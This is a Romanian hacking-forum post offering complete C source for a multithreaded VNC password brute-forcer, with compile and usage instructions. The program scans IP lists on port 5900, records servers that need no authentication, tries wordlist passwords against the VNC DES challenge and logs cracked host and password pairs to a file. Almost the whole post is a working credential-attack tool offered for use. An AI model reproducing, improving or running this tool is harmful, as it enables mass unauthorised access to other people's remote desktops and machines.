Jump to content
sssmoke

[RST] VNC Brute

Recommended Posts

Am vrut sa fac un brute de vncuri, fiindca din cate am vazut pe net, n-am gasit nici unul foarte rapid.

Folosirea e simpla, aveti nevoie de openssl instalat si il compilati cu gcc -o vnc vnc.c -lcrypto -lpthread.


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <openssl/des.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <pthread.h>
#include <ctype.h>

#define RED "\E[1;32;31m"
#define GREEN "\E[1;32;40m"
#define WHITE "\E[1;37;40m"
#define NORMAL "\E[m"
#define CLEARLN "\033[F\033[J"

#define CONNECT_TIMEOUT 2
#define READ_TIMEOUT 5

#define LOCK(x) pthread_mutex_lock(&x);
#define UNLOCK(x) pthread_mutex_unlock(&x);

static int maxqueue = 0;
static int brutemode = 0;

struct host_queue{
char * host;
char * pass;
struct host_queue * next;
};

struct combi {
char * host;
char * pass;
};

static time_t start, lmin;

static FILE *ipfile = NULL;
static FILE *outfile = NULL;
static FILE *passfile = NULL;

static int finished = 0;
static int done = 0;
static int good = 0;
static int total = 0;

static long qsize = 0;
static long lastmin = 0;
static int dmin = 0;

static struct host_queue * jobs = NULL;
static pthread_mutex_t stat_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t job_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t job_cond = PTHREAD_COND_INITIALIZER;
static pthread_cond_t job_size_cond = PTHREAD_COND_INITIALIZER;

static void usage(const char *s) {
printf(RED"Usage: %s <check|brute>\n"NORMAL, s);
exit(EXIT_SUCCESS);
}

static void usage_check(const char *s) {
printf(RED"Usage: %s check <vnc list> <threads>\n"NORMAL, s);
exit(EXIT_SUCCESS);
}

static void usage_brute(const char *s) {
printf(RED"Usage: %s brute <vnc list> <passfile> <threads>\n"NORMAL, s);
exit(EXIT_SUCCESS);
}

static void save_no_auth(const char *host) {
FILE *noauth = fopen("no.auth", "a+");
fprintf(noauth, "%s\n", host);
fclose(noauth);
}

static void save_vnc_list(const char *host) {
FILE *vnclist= fopen("vnc.list", "a+");
fprintf(vnclist, "%s\n", host);
fclose(vnclist);
}

static void queue_job(char *h, char *p) {
struct host_queue * hq = (struct host_queue *) malloc(sizeof(struct host_queue));

hq->host = h;
hq->pass = p;

hq->next = NULL;

LOCK(job_lock);

while(qsize >= maxqueue) pthread_cond_wait(&job_size_cond, &job_lock);

if(jobs == NULL) jobs = hq;

else {
hq->next = jobs;
jobs = hq;
}

++qsize;

pthread_cond_signal(&job_cond);
UNLOCK(job_lock);
}

static struct combi * dequeue_job(void){
struct combi * trynow = (struct combi *) malloc(sizeof(struct combi));

LOCK(job_lock);

while(jobs == NULL){
LOCK(stat_lock);

if(done == 1){
UNLOCK(stat_lock);
UNLOCK(job_lock);
free(trynow);
return NULL;
}

UNLOCK(stat_lock);
pthread_cond_wait(&job_cond, &job_lock);
}

trynow->host = jobs->host;
trynow->pass = jobs->pass;

struct host_queue * hq = jobs;
jobs = jobs->next;

--qsize;
pthread_cond_signal(&job_size_cond);

UNLOCK(job_lock);
free(hq);

return trynow;
}

static int send_msg(int sockfd, char *message) {
int n;

fd_set rset;
struct timeval timeout;

FD_ZERO(&rset);
FD_SET (sockfd, &rset);

timeout.tv_sec = READ_TIMEOUT;
timeout.tv_usec = 0;

n = select (sockfd + 1, NULL, &rset, NULL, &timeout);

if (n < 0) return -1;
else if (n == 0) return -1;
else n = send(sockfd, message, strlen(message), MSG_NOSIGNAL);

return n;
}

static int recv_msg(int sockfd, char **retmes) {
int n;
char *buffer = (char *) malloc(512);
bzero(buffer, 512);

*retmes = NULL;

fd_set rset;
struct timeval timeout;

FD_ZERO(&rset);
FD_SET (sockfd, &rset);

timeout.tv_sec = READ_TIMEOUT;
timeout.tv_usec = 0;

n = select (sockfd + 1, &rset, NULL, NULL, &timeout);

if(n <= 0) {
free(buffer);
return 0;
}

else n = read(sockfd, buffer, 511);
*retmes = buffer;

return n;
}

static char *Encrypt(char *Key, char *Msg, int size, char **dest) {
char *Res = NULL;
int n=0;

DES_cblock Key2, decry, plain1, plain2, result1, result2;
DES_key_schedule schedule;

Res = (char *) malloc(size + 1);
bzero(Res, size + 1);

memcpy(Key2, Key, 8);
memcpy(plain1, Msg, 8);
memcpy(plain2, Msg + 8, 8);

DES_set_odd_parity( &Key2 );
DES_set_key(&Key2, &schedule );

DES_ecb_encrypt(&plain1, &result1, &schedule, DES_ENCRYPT);
DES_ecb_encrypt(&plain2, &result2, &schedule, DES_ENCRYPT);

memcpy(Res, result1, 8);
memcpy(Res + 8, result2, 8);

*dest = Res;

return NULL;
}

static int checknow(const char *host, const char *pass) {
int sockfd, rc, i, n = 0, tmax = 0;
long arg;

unsigned char newkey[8];
bzero(newkey, 8);

for (i=0;i<strlen(pass);i++) {
int a = pass[i];
int b = 0;
int j;

for (j=0; j<8; j++) if (a & (1<<j))
b = b | (1<<7-j);

unsigned char d = b;
newkey[i] = d;
}

newkey[i] = '\0';

struct sockaddr_in remoteaddr;
remoteaddr.sin_family = AF_INET;
remoteaddr.sin_addr.s_addr = inet_addr(host);
remoteaddr.sin_port = htons(5900);

retry:
sockfd = socket(AF_INET, SOCK_STREAM, 0);

arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) goto retry;

struct linger so_linger;
so_linger.l_onoff = 1;
so_linger.l_linger = 0;

struct timeval tv;
int valopt;
tv.tv_sec = CONNECT_TIMEOUT;
tv.tv_usec = 0;

if(setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &so_linger, sizeof so_linger) > 0) {
close(sockfd);
goto retry;
}

if(setsockopt(sockfd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv))) {
close(sockfd);
goto retry;
}

if(setsockopt(sockfd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv))) {
close(sockfd);
goto retry;
}

char *recbuf = NULL;

if (connect(sockfd, (struct sockaddr *)&remoteaddr, sizeof(remoteaddr)) < 0) {
if (errno == EINPROGRESS) {
fd_set write_fds;
memset(&write_fds, 0, sizeof(write_fds));
FD_ZERO(&write_fds);
FD_SET(sockfd, &write_fds);
if (select(sockfd+1, NULL, &write_fds, NULL, &tv) > 0) {
socklen_t lon;
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) goto first;
}
else goto first;
}
else goto first;
}

n = recv_msg(sockfd, &recbuf);

if(n == 0 || !strstr(recbuf, "RFB 00") || n > 12)
goto first;

char *proto = malloc(13 * sizeof(char));
bzero(proto, 13);

if((recbuf[6] == '3' && recbuf[10] == '8') || (recbuf[6] == '4' && recbuf[10] == '1')) sprintf(proto, "RFB 003.008\n");
else if(recbuf[6] == '3' && recbuf[10] == '7') sprintf(proto, "RFB 003.007\n");
else sprintf(proto, "RFB 003.003\n");

if(send_msg(sockfd, proto) < 0) {
free(proto);
goto first;
}

free(recbuf);
n = recv_msg(sockfd, &recbuf);

if(n == 0) {
free(proto);
goto first;
}

unsigned char *response = malloc(17 * sizeof(char));
bzero(response, 17);

int code;

if(proto[10] == '7' || proto[10] == '8') {
free(proto);
int numberauth = recbuf[0], auth_supported = 0;

for(i=1; i<numberauth + 1; i++) {
if(recbuf[i] == 1) save_no_auth(host);
else if(recbuf[i] == 2) auth_supported = 1;
}

if(auth_supported == 0) {
free(response);
goto first;
}

if(brutemode == 1) {
LOCK(stat_lock);
good++;
UNLOCK(stat_lock);

long lpassed = time(0) - lmin;

if(lpassed == 60) {
LOCK(stat_lock);
lastmin = dmin / lpassed;
dmin=0;
lmin=time(0);
UNLOCK(stat_lock);
}

long passed = time(0) - start;
printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed);
LOCK(stat_lock);
save_vnc_list(host);
UNLOCK(stat_lock);
tmax = 3;
free(response);
goto first;
}

char authchar[1];
authchar[0] = '\x02';

if(send_msg(sockfd, authchar) < 0) {
free(response);
goto first;
}

free(recbuf);
n = recv_msg(sockfd, &recbuf);

if(n != 16) {
free(response);
goto first;
}

memcpy(response, recbuf, 16);
}

else {
free(proto);
code = recbuf[3];

if(code == 1) {
save_no_auth(host);
free(response);
goto first;
}

else if(code == 2 && n >= 20) {
if(brutemode == 1) {
LOCK(stat_lock);
good++;
UNLOCK(stat_lock);

long lpassed = time(0) - lmin;

if(lpassed == 60) {
LOCK(stat_lock);
lastmin = dmin / lpassed;
dmin=0;
lmin=time(0);
UNLOCK(stat_lock);
}

long passed = time(0) - start;
printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed);
LOCK(stat_lock);
save_vnc_list(host);
UNLOCK(stat_lock);
free(response);
tmax = 3;
goto first;
}

memcpy(response, recbuf + n - 16, 16);
}

else {
free(response);
goto first;
}
}

char *encrypted = NULL;
Encrypt(newkey, response, 16, &encrypted);

free(response);
free(recbuf);

if(send_msg(sockfd, encrypted) < 0) {
free(encrypted);
goto first;
}

free(encrypted);

n = recv_msg(sockfd, &recbuf);

if(n != 4) goto first;

code = recbuf[3];

long lpassed = time(0) - lmin;

if(lpassed == 60) {
LOCK(stat_lock);
lastmin = dmin / lpassed;
dmin=0;
lmin=time(0);
UNLOCK(stat_lock);
}

long passed = time(0) - start;
printf(CLEARLN"[ "WHITE"done: "GREEN"%d/%d"NORMAL" * "WHITE"speed: "GREEN"%lu tries/sec "NORMAL"* "WHITE"time: "GREEN"%lu sec"NORMAL" ]\n", good, finished, lastmin, passed);

if(code == 0) {
LOCK(stat_lock);
printf(CLEARLN""GREEN"[+] Valid: %s: %s\n\n"NORMAL, host, pass);
FILE *logfile = fopen("vnc.good", "a+");
fprintf(logfile, "%s %s\n", host, pass);
fclose(logfile);
UNLOCK(stat_lock);
}

first:
LOCK(stat_lock);
dmin++;
finished++;
UNLOCK(stat_lock);

free(recbuf);
close(sockfd);
return -1;
}

static void *worker_thread(void *worker) {
while(1) {
struct combi *trynow = dequeue_job();
if(trynow == NULL) break;
char *host = NULL, *pass = NULL;
host = trynow->host;
pass = trynow->pass;
if(host == NULL || pass == NULL) break;
checknow(host, pass);
free(trynow); free(host);
if(brutemode == 2) free(pass);
}
pthread_exit(NULL);
}

int main(int argc, char **argv) {
char ip[32] = {0}, pass[32] = {0};

if (argc < 2) usage(argv[0]);

if ((strcmp(argv[1], "check") == 0) && (argc != 4)) usage_check(argv[0]);
else if((strcmp(argv[1], "brute") == 0) && (argc != 5)) usage_brute(argv[0]);
else if(strcmp(argv[1], "check") != 0 && strcmp(argv[1], "brute") != 0) usage(argv[0]);

if (strcmp(argv[1], "check") == 0) brutemode = 1;
else if(strcmp(argv[1], "brute") == 0) brutemode = 2;

int num_threads;
char *list_host = NULL, *list_pass = NULL;

if (brutemode == 1) {
list_host = argv[2];
num_threads = atoi(argv[3]);
}
else {
list_host = argv[2];
list_pass = argv[3];
num_threads = atoi(argv[4]);
}

maxqueue = num_threads;

if(brutemode == 2) printf(WHITE"[*] IP List: %s Passwords: %s Threads: %d Log: vnc.good\n\n"NORMAL, list_host, list_pass, num_threads);
else printf(WHITE"[*] IP List: %s Threads: %d Log: vnc.list\n\n"NORMAL, list_host, num_threads);

start = time(0);
lmin = time(0);

if(!(ipfile = fopen(list_host, "r"))) {
printf("INVALID IP FILE: %s\n", argv[1]);
exit(0);
}
fclose(ipfile);

char **passwords;
int pcount=0;

if(brutemode == 2) {
if(!(passfile = fopen(list_pass, "r"))) {
printf("INVALID PASSWORDS FILE: %s\n", argv[3]);
exit(0);
}
fclose(passfile);

passfile = fopen(list_pass, "r");
while (1) {
if(!fgets((char *)&pass, sizeof(pass), passfile)) break;
if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0';
if (pass != NULL) pcount++;
}
fclose(passfile);

passwords = malloc(pcount * sizeof(char*));
pcount = 0;

passfile = fopen(list_pass, "r");
while (1) {
if(!fgets((char *)&pass, sizeof(pass), passfile)) break;
if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0';
if (pass != NULL) {
passwords[pcount] = malloc((strlen(pass)+1)*sizeof(char));
strcpy(passwords[pcount], pass);
pcount++;
}
}
fclose(passfile);
}

int i;
pthread_t *thread = (pthread_t *) malloc(sizeof(pthread_t)*num_threads);

pthread_attr_t attrs;
pthread_attr_init(&attrs);
pthread_attr_setdetachstate(&attrs, PTHREAD_CREATE_DETACHED);

for(i=0; i<num_threads; i++) {
pthread_create(&thread[i], &attrs, worker_thread, NULL);
pthread_detach(thread[i]);
}

if(brutemode == 1) {
ipfile = fopen(list_host, "r");
while(1) {
if(!fgets((char *)&ip, sizeof(ip), ipfile)) break;
if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0';
if (ip != NULL) {
char *host = (char *)malloc(strlen(ip) + 1);
strcpy(host, ip);
queue_job(host, "checkmod");
}
}
fclose(ipfile);
}
else {
int pc=0;
for(pc=0; pc<pcount; pc++) {
printf(CLEARLN""WHITE"[+]Working now with: %s\n\n"NORMAL, passwords[pc]);
ipfile = fopen(list_host, "r");
while(1) {
if(!fgets((char *)&ip, sizeof(ip), ipfile)) break;
if (ip[strlen(ip) - 1] == '\n') ip[strlen(ip) - 1] = '\0';
if (ip != NULL) {
char *host = (char *)malloc(strlen(ip) + 1);
char *pass = (char *)malloc(strlen(passwords[pc]) + 1);
strcpy(host, ip);
strcpy(pass, passwords[pc]);
queue_job(host, pass);
}
}
fclose(ipfile);
}
}

done=1;

for(i=0; i < num_threads; i++) pthread_cond_signal(&job_cond);

pthread_mutex_destroy(&job_lock);
pthread_cond_destroy(&job_cond);

sleep(20);

free(thread);

exit(0);
}

Daca aveti lista de ipuri si vreti doar sa verificati care au VNC si suporta autentificare dati:

./vnc check listaipuri numarthreaduri

Daca doriti sa faceti bruteforce direct:

./vnc brute listaipuri listaparole numarthreaduri

Daca gasiti vreun bug sau aveti sugestii de imbunatatire lasati mesaj ;)

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...